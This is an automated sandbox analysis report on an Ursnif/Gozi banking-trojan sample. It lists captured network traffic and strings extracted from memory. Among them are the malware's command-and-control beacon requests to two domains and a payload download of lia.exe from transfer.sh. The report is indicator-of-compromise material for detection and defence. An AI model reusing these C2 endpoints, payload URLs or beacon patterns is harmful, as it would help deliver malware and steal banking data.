Source: global traffic | HTTP traffic detected: GET /lnhNHa_2Btty8CaNj/2ZI6TN22qvUD/8ZPV4upYsm_/2FN7_2B_2BUcD0/ieoqnU4qUIxSEwBSHp3U9/VTOicK4Dg9CvfDD5/DOzqkKaYmXyqB_2/BBeVS9VS7cZ_2Bxp8N/QUqIP2qoG/d9YX0YxhQ9wrMxFsIM3_/2FpgIEySH_2F7iIla7P/RVB1W1dWGnBa303ekXLbS2/H9XWbOoIqxvpR/Y0oANlOz/wA_2FDoUg6f5pt9sPS8pXWN/S8nUx2g1cV/w178G4jzQvTUGix2J/FRZXUdQwbPuV/iCh6boYFIAo/eBnDiqYSbaisXu/CvhfCnnlGNsLFuBfY6dkH/EJQ5NM_2B10n/nvc8N HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: apr.intooltak.com
Source: global traffic | HTTP traffic detected: GET /cG9R2yLu/hwY1VC7UV0FGuTFHUDuWv94/dWPB0qINsS/UcOtH5ibuFGkRtRRz/TcTs3WrbL3kk/KH9_2B01P5_/2BqOCU5VAuO8RX/tDtOsh5JefONIGFgJjwJW/WTNQ_2BigLNUfSTv/vEQOtss42jXAD7m/Vb_2FBrZFcmnzVx4eL/FgvV_2F2J/WJxkKD87XHV59J1BIptx/grHAayUrM6ZXOpWMd4b/m8CaZcQ61hUgT0Er2sN6yR/jqxJkoogaoGBQ/oxZTsR50/IU6qlhp0LlHnTmpxFkzazjn/ZXLdcjlESY/R9eDED1XHAy_2FpXA/QYirrLarjNjS/_2Faftuam8rF_2F/1Ew HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: io.immontyr.com
Source: global traffic | HTTP traffic detected: POST /NmtPFuQd_2/BfdLYLn2BLCtH1Hsh/hg_2FVLDGfIg/gtHnWY07UvK/_2FGfiZdkTNp3n/qSVe2e02NbQuSngndCWZx/FHtx2JyPoVSWyJAF/Nf3MxwobjdKHeJw/QN32g1hXKaTKdLZpGQ/1rai86tHa/cARCkcyc0ZIXwpr6o7hy/9LscnpzGSQw_2BN65St/d5vH28LuyC5fwk6W58_2BJ/mW_2BjaYyboIc/4qfAAbea/H6DnQT_2FBDJuaMwLw_2Bis/Q5vm9_2Bsb/WNMn_2Bg9zRAyx8QD/EwO5ty_2BWJe/AeEgVlXP8KP/mEQSv1dRw/v0fxMe2Myiu1T/e HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | Content-Length: 2 | Host: io.immontyr.com
Source: RegAsm.exe, 00000008.00000003.412693608.0000000000E93000.00000004.00000001.sdmp | String found in binary or memory: http://apr.intooltak.com/lnhNHa_2Btty8CaNj/2ZI6TN22qvUD/8ZPV4upYsm_/2FN7_2B_2BUcD0/ieoqnU4qUIxSEwBSH
Source: RegAsm.exe, 00000008.00000003.457301811.00000000043A8000.00000004.00000040.sdmp, control.exe, 0000001C.00000003.532875532.000001DC0EF2C000.00000004.00000040.sdmp, control.exe, 0000001C.00000003.473440748.000001DC0EF2C000.00000004.00000040.sdmp, control.exe, 0000001C.00000002.544075134.000001DC0EF2C000.00000004.00000040.sdmp, rundll32.exe, 00000024.00000003.541235990.0000020FDF04C000.00000004.00000040.sdmp, rundll32.exe, 00000024.00000002.543904492.0000020FDF04C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.825382176.000001B91FF02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000029.00000002.826395409.00000163C5A02000.00000004.00000001.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt
Source: RegAsm.exe, 00000008.00000003.457301811.00000000043A8000.00000004.00000040.sdmp, control.exe, 0000001C.00000003.532875532.000001DC0EF2C000.00000004.00000040.sdmp, control.exe, 0000001C.00000003.473440748.000001DC0EF2C000.00000004.00000040.sdmp, control.exe, 0000001C.00000002.544075134.000001DC0EF2C000.00000004.00000040.sdmp, rundll32.exe, 00000024.00000003.541235990.0000020FDF04C000.00000004.00000040.sdmp, rundll32.exe, 00000024.00000002.543904492.0000020FDF04C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.825382176.000001B91FF02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000029.00000002.826395409.00000163C5A02000.00000004.00000001.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: RegAsm.exe, 00000008.00000003.457301811.00000000043A8000.00000004.00000040.sdmp, control.exe, 0000001C.00000003.532875532.000001DC0EF2C000.00000004.00000040.sdmp, control.exe, 0000001C.00000003.473440748.000001DC0EF2C000.00000004.00000040.sdmp, control.exe, 0000001C.00000002.544075134.000001DC0EF2C000.00000004.00000040.sdmp, rundll32.exe, 00000024.00000003.541235990.0000020FDF04C000.00000004.00000040.sdmp, rundll32.exe, 00000024.00000002.543904492.0000020FDF04C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.825382176.000001B91FF02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000029.00000002.826395409.00000163C5A02000.00000004.00000001.sdmp | String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: RuntimeBroker.exe, 00000029.00000000.607858316.00000163C251B000.00000004.00000001.sdmp | String found in binary or memory: http://ns.adobe.cmgR
Source: RuntimeBroker.exe, 00000029.00000000.607858316.00000163C251B000.00000004.00000001.sdmp | String found in binary or memory: http://ns.adobe.ux2
Source: RuntimeBroker.exe, 00000029.00000000.607858316.00000163C251B000.00000004.00000001.sdmp | String found in binary or memory: http://ns.adobp/
Source: RuntimeBroker.exe, 00000029.00000000.607858316.00000163C251B000.00000004.00000001.sdmp | String found in binary or memory: http://ns.micro/1
Source: powershell.exe, 00000016.00000002.586306503.0000020347CCF000.00000004.00000001.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000016.00000002.538900728.0000020337E6A000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: gozi.exe, 00000002.00000002.328014285.00000000031F4000.00000004.00000001.sdmp, powershell.exe, 00000016.00000002.537650333.0000020337C61000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: gozi.exe, 00000002.00000002.328074082.0000000003263000.00000004.00000001.sdmpString found in binary or memory: http://transfer.sh
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: powershell.exe, 00000016.00000002.538900728.0000020337E6A000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: powershell.exe, 00000016.00000002.586306503.0000020347CCF000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000016.00000002.586306503.0000020347CCF000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000016.00000002.586306503.0000020347CCF000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000016.00000002.538900728.0000020337E6A000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000016.00000002.586306503.0000020347CCF000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: gozi.exe, 00000002.00000002.328014285.00000000031F4000.00000004.00000001.sdmpString found in binary or memory: https://transfer.sh
                    Source: gozi.exe, 00000002.00000002.328014285.00000000031F4000.00000004.00000001.sdmpString found in binary or memory: https://transfer.sh/get/3dvhcv/lia.exe
                    Source: gozi.exe, 00000002.00000002.328014285.00000000031F4000.00000004.00000001.sdmpString found in binary or memory: https://transfer.sh4jl
                    Source: unknownDNS traffic detected: queries for: transfer.sh
                    Source: global trafficHTTP traffic detected: GET /get/3dvhcv/lia.exe HTTP/1.1Host: transfer.shConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /vlSm5FdhwFmMvT/YOr1y3vmv8eg4Ac3b7Y_2/BxNzh6No2PWjhu_2/Fyyb9C79h8hjmv0/0MJdM07T0vYSwv1YW8/_2F13x6Wl/Lrng4lSkMN3h4WUh3_2B/V0ttocBRKlq9AtXNAro/11M6x_2BaL1Zjx_2BWp4qX/FgWuexW_2FQbO/w_2FMf21/MXsR7_2BkMZgcjp0nVIxUlY/KUQNsPRxFs/f5vu_2BQoVI2fu6H_/2BIGCwdRzvbj/hz_2BIOSiZR/JFogKN88OOAHtb/M_2BNELxC21s15Johd0jZ/ulyOnBSm1PSraDUT/nl6kvDdqLoljmN_/2B2yicis3/ZYLr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
                    Source: global trafficHTTP traffic detected: GET /g37w_2FYO/KW18Y37P4Dg_2F1TMh_2/FK2ujRayUy6lspI6qOC/AgWOSVQoUjByibFH6VxOps/v3Ehdrv875bm_/2Bs0w7UO/8HLDir_2FrS7hQvf7_2F_2F/dRVLAAfuPh/m30EKXD6FtreycZoi/lobTM_2FcJdc/YK8geqpXCxP/dDLbqs1jlQyVsA/bp_2Fxijgc04UGfwb6H7A/hHd5lPMnnVOlY1xb/cpTKFIgzAGJyGab/7_2BPVHreJHJUQdZTy/CjJC9x69g/tFYle1uxB8JrgYxIiF_2/BMgOKImH_2BEsdbiTm7/xqsfHc14yTZglOas0gOCoM/8tPVx3GttAeuK/bZvFimTpFp_2B/LS HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
                    Source: global trafficHTTP traffic detected: GET /lnhNHa_2Btty8CaNj/2ZI6TN22qvUD/8ZPV4upYsm_/2FN7_2B_2BUcD0/ieoqnU4qUIxSEwBSHp3U9/VTOicK4Dg9CvfDD5/DOzqkKaYmXyqB_2/BBeVS9VS7cZ_2Bxp8N/QUqIP2qoG/d9YX0YxhQ9wrMxFsIM3_/2FpgIEySH_2F7iIla7P/RVB1W1dWGnBa303ekXLbS2/H9XWbOoIqxvpR/Y0oANlOz/wA_2FDoUg6f5pt9sPS8pXWN/S8nUx2g1cV/w178G4jzQvTUGix2J/FRZXUdQwbPuV/iCh6boYFIAo/eBnDiqYSbaisXu/CvhfCnnlGNsLFuBfY6dkH/EJQ5NM_2B10n/nvc8N HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
                    Source: global trafficHTTP traffic detected: GET /cG9R2yLu/hwY1VC7UV0FGuTFHUDuWv94/dWPB0qINsS/UcOtH5ibuFGkRtRRz/TcTs3WrbL3kk/KH9_2B01P5_/2BqOCU5VAuO8RX/tDtOsh5JefONIGFgJjwJW/WTNQ_2BigLNUfSTv/vEQOtss42jXAD7m/Vb_2FBrZFcmnzVx4eL/FgvV_2F2J/WJxkKD87XHV59J1BIptx/grHAayUrM6ZXOpWMd4b/m8CaZcQ61hUgT0Er2sN6yR/jqxJkoogaoGBQ/oxZTsR50/IU6qlhp0LlHnTmpxFkzazjn/ZXLdcjlESY/R9eDED1XHAy_2FpXA/QYirrLarjNjS/_2Faftuam8rF_2F/1Ew HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: io.immontyr.com
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                    Source: unknownHTTP traffic detected: POST /NmtPFuQd_2/BfdLYLn2BLCtH1Hsh/hg_2FVLDGfIg/gtHnWY07UvK/_2FGfiZdkTNp3n/qSVe2e02NbQuSngndCWZx/FHtx2JyPoVSWyJAF/Nf3MxwobjdKHeJw/QN32g1hXKaTKdLZpGQ/1rai86tHa/cARCkcyc0ZIXwpr6o7hy/9LscnpzGSQw_2BN65St/d5vH28LuyC5fwk6W58_2BJ/mW_2BjaYyboIc/4qfAAbea/H6DnQT_2FBDJuaMwLw_2Bis/Q5vm9_2Bsb/WNMn_2Bg9zRAyx8QD/EwO5ty_2BWJe/AeEgVlXP8KP/mEQSv1dRw/v0fxMe2Myiu1T/e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Content-Length: 2Host: io.immontyr.com
                    Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49743 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing:

                    Yara detected Ursnif

                    E-Banking Fraud:

                    Yara detected Ursnif